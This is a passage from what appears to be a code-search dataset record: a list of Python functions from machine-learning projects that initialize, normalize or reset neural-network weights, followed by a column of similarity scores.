nn.init._calculate_fan_in_and_fan_out(m.weight.data)\n bound = 1 / math.sqrt(fan_out)\n nn.init.normal_(m.bias, -bound, bound)", "def normalize_weights(self):\n total_weight = sum(self.weights)\n self.norm_weights = self.weights / float(total_weight)", "def _initialize_weights(self):\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0, 0.05)\r\n if m.bias is not None:\r\n m.bias.data.zero_()", "def initialize_weights(self):\n for layer in self._cnn_layers:\n weights_initializer.WeightsInitializer.initialize_layer_or_model(layer)", "def init_weights(self):\n # We don't use the `init_weights()` function in BaseModule, since it\n # doesn't support the initialization method from `reset_parameters()`\n # in Pytorch.\n if self.with_backbone:\n self.backbone.init_weights()\n\n if self.with_neck:\n for m in self.neck.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()\n\n if self.with_head:\n for m in self.head.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n xavier_uniform_(m.weight)\n if m.bias is not None:\n zeros_(m.bias)", "def normalize_weights(self):\n \n # Set negative weights to zero\n # Normalize to sum to one.\n \n\n\n self.new_weight=[]\n for i in self._weights:\n if any(i < 0 for i in self._weights):\n self.new_weight = [0,1]\n\n elif all(i == 0 for i in self._weights):\n i = 1/len(self._weights)\n self.new_weight.append(i)\n else:\n i = i/sum(self._weights)\n self.new_weight.append(i)\n\n # If the weights are all zeros, set weights equal to 1/k, where k is the number\n # of components.\n self._weights = self.new_weight\n self._weights = np.round(self._weights,3)", "def normalizeWeights(self):\n for wt in self.weights:\n wt[wt>1] = 1\n wt[wt<-1] = -1\n for bs in self.bias:\n bs[bs>1] = 1\n bs[bs<-1] = -1", "def _reset_weights(m):\n\n nn = import_optional_dependency(\"torch.nn\")\n init = import_optional_dependency(\"torch.nn.init\")\n if isinstance(m, nn.Conv1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.BatchNorm1d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm3d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.Linear):\n init.xavier_normal_(m.weight.data)\n init.normal_(m.bias.data)\n elif isinstance(m, nn.LSTM):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.LSTMCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRU):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRUCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)", "def remove_norms(module_: \"WN\") -> \"WN\":\n module_.start = torch.nn.utils.remove_weight_norm(module_.start_conv)\n module_.cond_layer = torch.nn.utils.remove_weight_norm(module_.cond_layer)\n for i, layer_ in enumerate(module_.in_layers):\n layer_ = DepthwiseSeparableConv1d.remove_batch_norm(layer_)\n module_.in_layers[i] = layer_\n for i, layer_ in enumerate(module_.res_skip_layers):\n layer_ = torch.nn.utils.remove_weight_norm(layer_)\n module_.res_skip_layers[i] = layer_\n return module_", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.ent_proj_vects.data = normalize(self.ent_proj_vects.data, p=2, dim=1)\n self.rel_proj_vects.data = normalize(self.rel_proj_vects.data, p=2, dim=1)", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.ConvTranspose2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n xavier_init(m)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.projection_matrices.data = normalize(self.projection_matrices.data, p=2, dim=2)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)", "def init_weights(self, clz):\n for ch in self.children():\n if issubclass(ch.__class__, nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: clz._init_weights(self.lrm, module))", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)\n self.normal_vectors.data = normalize(self.normal_vectors, p=2, dim=1)", "def remove_weight_norm_(self):\n\n def _remove_weight_norm(m):\n try:\n torch.nn.utils.remove_weight_norm(m)\n except ValueError:\n return\n\n self.apply(_remove_weight_norm)", "def init_weight(self):\n init_layer(self.conv1)\n init_layer(self.conv2)\n init_bn(self.norm1)\n init_bn(self.norm2)", "def normalize(self, weights):\n tot = sum(weights)\n newW = [-1] * self.numParticles\n for i in range(len(weights)):\n newW[i] = weights[i] / tot\n return newW", "def layer_normalize_(self, ref_point: 'ModelParameters', order=2):\n # in-place normalize each parameter\n for layer_idx, parameter in enumerate(self.parameters, 0):\n parameter *= (ref_point.layer_norm(layer_idx, order) / self.layer_norm(layer_idx, order))", "def init_weights(self):\n\n for ch in self.children():\n if issubclass(ch.__class__, torch.nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: self.transformer.__class__._init_weights(self.transformer, module))", "def init_weights(layer):\r\n layer_name = layer.__class__.__name__\r\n if layer_name.find(\"Conv\") != -1:\r\n layer.weight.data.normal_(0.0, 0.02)\r\n elif layer_name.find(\"BatchNorm\") != -1:\r\n layer.weight.data.normal_(1.0, 0.02)\r\n layer.bias.data.fill_(0)", "def _rescale_module(module):\n for sub in module.modules():\n if isinstance(sub, (nn.Conv1d, nn.ConvTranspose1d, nn.Conv2d, nn.ConvTranspose2d)):\n std = sub.weight.std().detach()\n scale = (std / 0.1) ** 0.5\n sub.weight.data /= scale\n if sub.bias is not None:\n sub.bias.data /= scale", "def init_weights(layer):\n layer_name = layer.__class__.__name__\n if layer_name.find(\"Conv\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(0.0, 0.02)\n elif layer_name.find(\"BatchNorm\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(1.0, 0.02)\n layer.bias.data.fill_(0)", "def _compute_weights(self):\n with tf.name_scope('compute_weights'):\n self.layer.kernel = tf.nn.l2_normalize(\n self.v, axis=self.kernel_norm_axes) * self.g", "def init_weights(self):\n for m in self.cls_convs:\n normal_init(m.conv, std=0.01)\n for m in self.reg_convs:\n normal_init(m.conv, std=0.01)\n bias_cls = bias_init_with_prob(0.01)\n normal_init(self.retina_cls, std=0.01, bias=bias_cls)\n normal_init(self.retina_reg, std=0.01)", "def apply_on_layer(self, layer):\n init_g = Constant(1.)\n\n try:\n weight_tag = 'W' if hasattr(layer, 'W') else 'U'\n except AttributeError:\n raise AttributeError(\"Trying to call weight norm on {} \".format(layer)+\\\n \"without layer.W or layer.U defined\")\n weights = getattr(layer, weight_tag)\n\n Wndim = weights.get_value().ndim\n if Wndim == 4:\n W_axes_to_sum = (1,2,3)\n W_dimshuffle_args = (0,'x','x','x')\n elif Wndim == 5:\n W_axes_to_sum = (1,2,3,4)\n W_dimshuffle_args = (0,'x','x','x','x')\n elif Wndim == 3 :\n raise NotImplementedError(\"What is a weight with 3 dimensions?\")\n else :\n W_axes_to_sum = 0\n W_dimshuffle_args = ('x',0)\n\n if self.train_g is not None:\n g = init_g(layer.output_dims)\n g = theano.shared(g, name=layer.prefix+'_g')\n if self.train_g :\n layer.params += [g]\n\n new_weights = weights * (\n g / T.sqrt(1e-6 + T.sum(T.square(weights),\n axis=W_axes_to_sum))).dimshuffle(*W_dimshuffle_args)\n layer.g = g\n else:\n new_weights = weights / \\\n T.sqrt(1e-6 + T.sum(T.square(weights),\n axis=W_axes_to_sum,keepdims=True))\n\n setattr(layer, weight_tag, new_weights)", "def normalize_weights(w, dims=(0,), bias=1e-5):\n with tf.name_scope('normalization'):\n return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))", "def init_weights(self):\n for m in self.cls_convs:\n normal_init(m.conv, std=0.01)\n for m in self.reg_convs:\n normal_init(m.conv, std=0.01)\n normal_init(self.atss_reg, std=0.01)\n normal_init(self.atss_iou, std=0.01)\n bias_cls = bias_init_with_prob(0.01)\n normal_init(self.atss_cls, std=0.01, bias=bias_cls)", "def remove_weight_norm(self):\n\n def _remove_weight_norm(m):\n try:\n logging.debug(f\"Weight norm is removed from {m}.\")\n torch.nn.utils.remove_weight_norm(m)\n except ValueError: # this module didn't have weight norm\n return\n\n self.apply(_remove_weight_norm)", "def remove_weight_norm(self):\n\n def _remove_weight_norm(m):\n try:\n logging.debug(f\"Weight norm is removed from {m}.\")\n torch.nn.utils.remove_weight_norm(m)\n except ValueError: # this module didn't have weight norm\n return\n\n self.apply(_remove_weight_norm)", "def layer_norm(input, normalized_shape, weight, bias, eps=1e-5):\n return FunctionLib.apply(\n 'LayerNorm', input.device, [input, weight, bias],\n axis=input.ndimension() - len(normalized_shape), epsilon=eps)", "def init_weights(model, fc_init_std=0.01):\n for m in model.modules():\n if isinstance(m, nn.Conv3d):\n \"\"\"\n Follow the initialization method proposed in:\n {He, Kaiming, et al.\n \"Delving deep into rectifiers: Surpassing human-level\n performance on imagenet classification.\"\n arXiv preprint arXiv:1502.01852 (2015)}\n \"\"\"\n c2_msra_fill(m, nonlinearity=('relu', 'leaky_relu')[0])\n # c2_xavier_fill(m)\n # nn.init.xavier_normal_(m.weight)\n # nn.init.xavier_uniform_(m.weight)\n # if m.bias is not None: # pyre-ignore\n # nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm3d) or isinstance(m, nn.InstanceNorm3d):\n m.weight.data.fill_(1.0)\n m.bias.data.zero_()\n if isinstance(m, nn.Linear): # This assumes nn.Linear is the final layers\n # TODO check to see if this is effective in this architecture since the final is a conv3d\n m.weight.data.normal_(mean=0.0, std=fc_init_std)\n m.bias.data.zero_()", "def normalize_weights(self, w):\n n = w.astype(np.float64, copy=True)\n c = float(np.sum(w))\n n /= c\n return n", "def forward(self, x, mask):\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)", "def _setWeights(self):\r\n for layer in self.layer_names:\r\n raw_w = getattr(self, f'{layer}_raw')\r\n self.module._parameters[layer] = F.dropout(raw_w, p=self.weight_pro, training=self.training)", "def remove_norms(self):\n dev = next(self.parameters()).device\n for name, module in self.named_modules():\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0_reverse')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_weight_norm(module)\n print(\"Removed wnorm from {}\".format(name))\n except:\n pass\n self.to(device=dev)", "def train(self, mode=True, freeze_bn=False):\n super(WideResNet, self).train(mode)\n self.freeze_bn = freeze_bn\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def forward(self, x, mask):\n \"Pass the input (and mask) through each layer in turn\"\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)", "def weight_norm(module, name=\"weight\", dim=0):\n WeightNorm.apply(module, name, dim)\n return module", "def _init_weights(self):\n nn.init.xavier_normal_(self.out.weight)", "def normalize(self):\n norm_val = self.sum2/self.sum1\n self.sum1=0\n\n for sentence in self.data_set:\n sentence.weight *= norm_val\n self.sum1 += sentence.weight", "def init_weights(net):\n for m in net.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_uniform_(m.weight)\n # nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n return net", "def filter_normalize_(self, ref_point: 'ModelParameters', order=2):\n for l in range(len(self.parameters)):\n # normalize one-dimensional bias vectors\n if len(self.parameters[l].size()) == 1:\n self.parameters[l] *= (ref_point.parameters[l].norm(order) / self.parameters[l].norm(order))\n # normalize two-dimensional weight vectors\n for f in range(len(self.parameters[l])):\n self.parameters[l][f] *= ref_point.filter_norm((l, f), order) / (self.filter_norm((l, f), order))", "def initialize(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)", "def update_weights(self):\n\n self.weights -= self.loss_grads\n self.loss_grads = np.zeros(self.weights.shape)", "def init_weights(self, module):\n if isinstance(module, (torch.nn.Linear, torch.nn.Embedding, torch.nn.LayerNorm)):\n module.weight.data.normal_(mean=0.0, std=self.initializer_range)\n if isinstance(module, (torch.nn.Linear, torch.nn.LayerNorm)) and module.bias is not None:\n module.bias.data.zero_()", "def reset_all_weights(model: nn.Module) -> None:\n\n @torch.no_grad()\n def weight_reset(m: nn.Module):\n # - check if the current module has reset_parameters & if it's callabed called it on m\n reset_parameters = getattr(m, \"reset_parameters\", None)\n if callable(reset_parameters):\n m.reset_parameters()\n\n # Applies fn recursively to every submodule see: https://pytorch.org/docs/stable/generated/torch.nn.Module.html\n model.apply(fn=weight_reset)", "def update_layers(self):\n\n # Para cada layer atualiza utilizando o gradiente descendente e o learning rate\n for layer in self.layers:\n layer.update_layer(self.learning_rate)", "def weights_init(mod):\n classname = mod.__class__.__name__\n if classname.find('Conv') != -1:\n mod.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n mod.weight.data.normal_(1.0, 0.02)\n mod.bias.data.fill_(0)", "def init_weights(self):\n\n params = torch.load(self.resnet_weight)\n\n self.fc1.weight.data = params['state_dict']['module.fc.weight'].clone()\n self.fc1.bias.data = params['state_dict']['module.fc.bias'].clone()\n\n\n r = np.sqrt(1.) / np.sqrt(self.fc3.in_features +\n self.fc3.out_features)\n self.fc3.weight.data.uniform_(-r, r)\n self.fc3.bias.data.fill_(0)\n r = np.sqrt(1.) / np.sqrt(self.fc2.in_features +\n self.fc2.out_features)\n self.fc2.weight.data.uniform_(-r, r)\n self.fc2.bias.data.fill_(0)\n r = np.sqrt(1.) / np.sqrt(self.fc4.in_features +\n self.fc4.out_features)\n self.fc4.weight.data.uniform_(-r, r)\n self.fc4.bias.data.fill_(0)", "def spectral_norm_parallel(self):\n weights = {}\n for l in self.all_conv_layers:\n weight = l.weight_normalized\n weight_mat = weight.view(weight.size(0), -1)\n if weight_mat.shape not in weights:\n weights[weight_mat.shape] = []\n weights[weight_mat.shape].append(weight_mat)\n loss = 0\n for i in weights:\n weights[i] = torch.stack(weights[i], dim=0)\n with torch.no_grad():\n num_iter = self.num_power_iter\n if i not in self.sr_u:\n num_w, row, col = weights[i].shape\n self.sr_u[i] = F.normalize(torch.ones(num_w, row).normal_(0, 1), dim=1, eps=0.001)\n self.sr_v[i] = F.normalize(torch.ones(num_w, col).normal_(0, 1), dim=1, eps=0.001)\n num_iter = 10 * self.num_power_iter\n for j in range(num_iter):\n self.sr_v[i] = F.normalize(torch.matmul(self.sr_u[i].unsqueeze(1), weights[i]).squeeze(1), dim=1, eps=0.001)\n self.sr_u[i] = F.normalize(torch.matmul(weights[i], self.sr_v[i].unsqueeze(2)).squeeze(2), dim=1, eps=0.001)\n sigma = torch.matmul(self.sr_u[i].unsqueeze(1), torch.matmul(weights[i], self.sr_v[i].unsqueeze(2)))\n loss += torch.sum(sigma)\n return loss", "def normalize_weight(self, Z):\n self.weight /= Z", "def init_weights(self):\n for i in range(5):\n default_init_weights(getattr(self, f'conv{i+1}'), 0.1)", "def initialize_weights(self):\n weights_initializer.WeightsInitializer.initialize_layer_or_model(\n self._batch)", "def update_weights(self):\n activation, activation_p = self.feedforward()\n # initialize delta_weights\n delta_w = np.zeros(2)\n # simultaneous calculate delta_weights\n for i, element in enumerate(self.y):\n delta_w += (activation[i]-element)*(activation_p[i])*self.X[i]\n # update weight\n self.weights -= self.alfa*delta_w", "def normalise(self):\n total = 0\n for feat_set in self.values():\n for value in feat_set.values():\n total += value\n norm = 1/total\n for feat_set in self.values():\n for feat in feat_set:\n feat_set[feat] *= norm\n return self", "def _init_norm(self, weights):\n from tensorflow.python.ops.linalg_ops import norm\n with variable_scope.variable_scope('init_norm'):\n flat = array_ops.reshape(weights, [-1, self.layer_depth])\n return array_ops.reshape(norm(flat, axis=0), (self.layer_depth,))", "def _init_norm(self, weights):\n from tensorflow.python.ops.linalg_ops import norm\n with variable_scope.variable_scope('init_norm'):\n flat = array_ops.reshape(weights, [-1, self.layer_depth])\n return array_ops.reshape(norm(flat, axis=0), (self.layer_depth,))", "def initialize_weights(self):\n tf.nest.map_structure(\n weights_initializer.WeightsInitializer.initialize_layer_or_model,\n self._layer_nest)", "def init_weights(m):\n if isinstance(m, nn.Conv2d):\n # Note that there is no bias due to BN\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(mean=0.0, std=math.sqrt(2.0 / fan_out))\n elif isinstance(m, nn.BatchNorm2d):\n zero_init_gamma = cfg.BN.ZERO_INIT_FINAL_GAMMA\n zero_init_gamma = hasattr(m, \"final_bn\") and m.final_bn and zero_init_gamma\n m.weight.data.fill_(0.0 if zero_init_gamma else 1.0)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(mean=0.0, std=0.01)\n m.bias.data.zero_()", "def normalise(self):\n s = self._sum()\n if s != 0:\n for element, value in self.focals.items():\n self.focals[element] /= s", "def weights_init(m):\n if (\n isinstance(m, nn.Linear)\n or isinstance(m, nn.EmbeddingBag)\n or isinstance(m, nn.Embedding)\n or isinstance(m, SparseLinear)\n ):\n nn.init.xavier_normal_(m.weight)", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def init_weights(self) -> None:\n nn.init.kaiming_normal_(self._U)\n nn.init.kaiming_normal_(self._W)\n nn.init.kaiming_normal_(self._V)\n\n nn.init.normal_(self._b)", "def reset_model(model):\n\n\tfor layer in model.layers:\n\t\t# Note: these are custom depending on the layer type\n\t\tif '.MoleculeConv' in str(layer):\n\t\t\tW_inner = layer.init_inner((layer.inner_dim, layer.inner_dim))\n\t\t\tb_inner = np.zeros((1, layer.inner_dim))\n\t\t\t# Inner weights\n\t\t\tlayer.W_inner.set_value((T.tile(W_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, layer.inner_dim, layer.inner_dim)).eval()).astype(np.float32))\n\t\t\tlayer.b_inner.set_value((T.tile(b_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, 1, layer.inner_dim)).eval()).astype(np.float32))\n\n\t\t\t# Outer weights\n\t\t\tW_output = layer.init_output((layer.inner_dim, layer.units), scale = layer.scale_output)\n\t\t\tb_output = np.zeros((1, layer.units))\n\t\t\t# Initialize weights tensor\n\t\t\tlayer.W_output.set_value((T.tile(W_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlayer.b_output.set_value((T.tile(b_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlogging.info('graphFP layer reset')\n\n\t\telif '.Dense' in str(layer):\n\t\t\tlayer.W.set_value((layer.init(layer.W.shape.eval()).eval()).astype(np.float32))\n\t\t\tlayer.b.set_value(np.zeros(layer.b.shape.eval(), dtype=np.float32))\n\t\t\tlogging.info('dense layer reset')\n\n\t\telif '.Dropout' in str(layer):\n\t\t\tlogging.info('dropout unchanged')\n\t\telse:\n\t\t\traise ValueError('Unknown layer {}, cannot reset weights'.format(str(layer)))\n\tlogging.info('Reset model weights')\n\treturn model", "def normalization(channels):\n return GroupNorm32(32, channels)", "def init_weights(m):\n if isinstance(m, nn.Conv2d):\n # Note that there is no bias due to BN\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(mean=0.0, std=np.sqrt(2.0 / fan_out))\n elif isinstance(m, nn.BatchNorm2d):\n zero_init_gamma = cfg.BN.ZERO_INIT_FINAL_GAMMA\n zero_init_gamma = hasattr(m, \"final_bn\") and m.final_bn and zero_init_gamma\n m.weight.data.fill_(0.0 if zero_init_gamma else 1.0)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(mean=0.0, std=0.01)\n m.bias.data.zero_()", "def forward_propagate(self):\n for i in range(0, len(self.output_layer)):\n output = 0\n\n # Loop through each Neuron in the hidden layer\n for neuron in self.hidden_layer:\n output += neuron.weights[i] * neuron.output\n\n # Update summation for output classifier\n self.output_layer[i] = output", "def weights_init_normal(m):\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0.0, 0.02)\r\n elif isinstance(m, nn.BatchNorm2d):\r\n m.weight.data.normal_(1.0, 0.02)\r\n m.bias.data.fill_(0)", "def model_normalize_(self, ref_point: 'ModelParameters', order=2):\n for parameter in self.parameters:\n parameter *= (ref_point.model_norm(order) / self.model_norm())", "def weights_init(m):\n if(type(m) == nn.ConvTranspose2d or type(m) == nn.Conv2d):\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif(type(m) == nn.BatchNorm2d):\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)", "def weights_init(m):\n if(type(m) == nn.ConvTranspose2d or type(m) == nn.Conv2d):\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif(type(m) == nn.BatchNorm2d):\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)", "def apply_weights(self):\n return self.X.dot(self.get_weights())", "def extract_weights(self, name):\n\n # Extract weights\n weight_layer = (self.merged_model).get_layer(name)\n weights = weight_layer.get_weights()[0]\n\n # Normalize\n # weights = weights / np.linalg.norm(weights, axis = 1).reshape((-1, 1))\n return weights", "def normalize_all(self):\n #for i, vector in enumerate(self.real_vectors):\n # self.real_vectors[i] /= np.linalg.norm(vector)\n self.vectors /= np.linalg.norm(self.vectors, axis=1).reshape(-1,1)\n for i, vector in enumerate(self.real_vectors):\n vector.set(self.vectors[i])", "def normalize_weights(self, labels, weights):\n if self._ragged:\n labels, _, weights, _ = utils.ragged_to_dense(labels, None, weights)\n return self._normalize_weights_impl(labels, weights)", "def normalizeWeights(self):\n\n\t\t# Normalizing crossover and mutation handler weights, result is a CDF\n\t\ttotal = sum(self.mutation_handlers_weights)\n\t\tcumsum = 0\n\t\tfor i in range(len(self.mutation_handlers_weights)):\n\t\t\tcumsum += self.mutation_handlers_weights[i]\n\t\t\tself.mutation_handlers_weights[i] = cumsum/total\n\t\ttotal = sum(self.crossover_handlers_weights)\n\t\tcumsum = 0\n\t\tfor i in range(len(self.crossover_handlers_weights)):\n\t\t\tcumsum += self.crossover_handlers_weights[i]\n\t\t\tself.crossover_handlers_weights[i] = cumsum/total", "def update_network(self, a, batch_size):\n for layer in self.layers:\n layer.weights_update(a, self.alpha, self.l2_lambda, batch_size)\n a = layer.a", "def init_weights(self):\n # Initialize weights\n self.apply(self._init_weights)", "def remove_norms(model: \"SqueezeWave\") -> \"SqueezeWave\":\n squeeze_wave = model\n for i, wn_layer in enumerate(squeeze_wave.wn_layers):\n squeeze_wave.wn_layers[i] = WN.remove_norms(wn_layer)\n return squeeze_wave", "def apply_batch_normalization(self, layer):\n if type(layer) is not BatchNormalization:\n raise ValueError('The `layer` must be neoml.Dnn.BatchNormalization.')\n\n self._internal.apply_batch_normalization(layer._internal)", "def normalize(w: torch.Tensor):\n\n if w.dim() > 1:\n return _matrix(w)\n\n return _vector(w)", "def init_weights(self, leveledinit: bool, kernel_size: int, bias: bool) -> None:\n if leveledinit:\n nn.init.normal_(self.conv1d.weight, std=1e-3)\n nn.init.normal_(self.conv1d.bias, std=1e-6)\n with torch.no_grad():\n self.conv1d.weight[:, 0, :] += 1.0 / kernel_size\n else:\n nn.init.xavier_uniform_(self.conv1d.weight)\n\n if self.embed in (\"pre\", \"post\"):\n nn.init.xavier_uniform_(self.embedding.weight)", "def normalize_layer(tensor, name, norm_use='bn'):\n if norm_use == \"gn\":\n x = GroupNorm(name=name + 'gn', groups=32)(tensor)\n elif norm_use == \"bn\":\n x = tf.keras.layers.BatchNormalization(axis=-1, name=name + 'bn', epsilon=1.001e-5)(tensor)\n elif norm_use == \"rbn\":\n x = tf.keras.layers.BatchNormalization(axis=-1, name=name + 'rbn', epsilon=1.001e-5, renorm=True)(tensor)\n elif norm_use == \"in\":\n x = InstanceNormalization(axis=-1, name=name + 'in')(tensor)\n else:\n x = tensor\n return x", "def _initialize_weights(self):\n for _, cell in self.cells_and_names():\n if isinstance(cell, nn.Conv2d):\n cell.weight.set_data(orthogonal(cell.weight.shape, 0.6))\n if cell.bias is not None:\n cell.bias.set_data(\n init.initializer(init.Constant(0.01), cell.bias.shape,\n cell.bias.dtype))", "def reset_weights(self):\n self.policy_backbone.reset_weights()\n self.value_backbone.reset_weights()\n self.action_head.reset_weights()\n self.critic_head.reset_weights()", "def init_weights(m: Union[torch.nn.Conv3d, torch.nn.BatchNorm3d]) -> None:\n import torch\n if isinstance(m, torch.nn.Conv3d):\n torch.nn.init.normal_(m.weight, 0, 0.01)\n elif isinstance(m, torch.nn.BatchNorm3d):\n torch.nn.init.constant_(m.weight, 1)\n torch.nn.init.constant_(m.bias, 0)", "def _init_layers(self) -> None:\n self.self_attn = MultiheadAttention(**self.self_attn_cfg)\n self.cross_attn = MultiheadAttention(**self.cross_attn_cfg)\n self.embed_dims = self.self_attn.embed_dims\n self.ffn = FFN(**self.ffn_cfg)\n norms_list = [\n build_norm_layer(self.norm_cfg, self.embed_dims)[1]\n for _ in range(3)\n ]\n self.norms = ModuleList(norms_list)" ]
[ "0.7143955", "0.7143955", "0.7143955", "0.71335757", "0.7069364", "0.7069364", "0.70534694", "0.7049442", "0.70303166", "0.6807604", "0.6779128", "0.6764302", "0.67596924", "0.6736109", "0.6710482", "0.66960436", "0.6584008", "0.6554928", "0.6526808", "0.65179425", "0.65166473", "0.6464522", "0.64566517", "0.6440153", "0.6430107", "0.64231014", "0.6402119", "0.6390117", "0.6374696", "0.6365841", "0.6364822", "0.6355938", "0.634237", "0.63393766", "0.6339081", "0.63101", "0.62984", "0.62978876", "0.62978876", "0.62978506", "0.6286966", "0.62779987", "0.6273961", "0.6270426", "0.62676316", "0.62653995", "0.6218249", "0.61947995", "0.61873454", "0.6181009", "0.6133146", "0.6123111", "0.6122635", "0.61212605", "0.61159825", "0.6097101", "0.60863924", "0.60686415", "0.6063407", "0.60578144", "0.60414445", "0.6031333", "0.6014542", "0.60114884", "0.6010666", "0.6007938", "0.6007938", "0.60051227", "0.59904414", "0.5984486", "0.5977653", "0.5967083", "0.5967083", "0.595422", "0.595331", "0.59511894", "0.59511876", "0.59488463", "0.59434247", "0.5940112", "0.5939761", "0.5939761", "0.5938668", "0.59362733", "0.5908928", 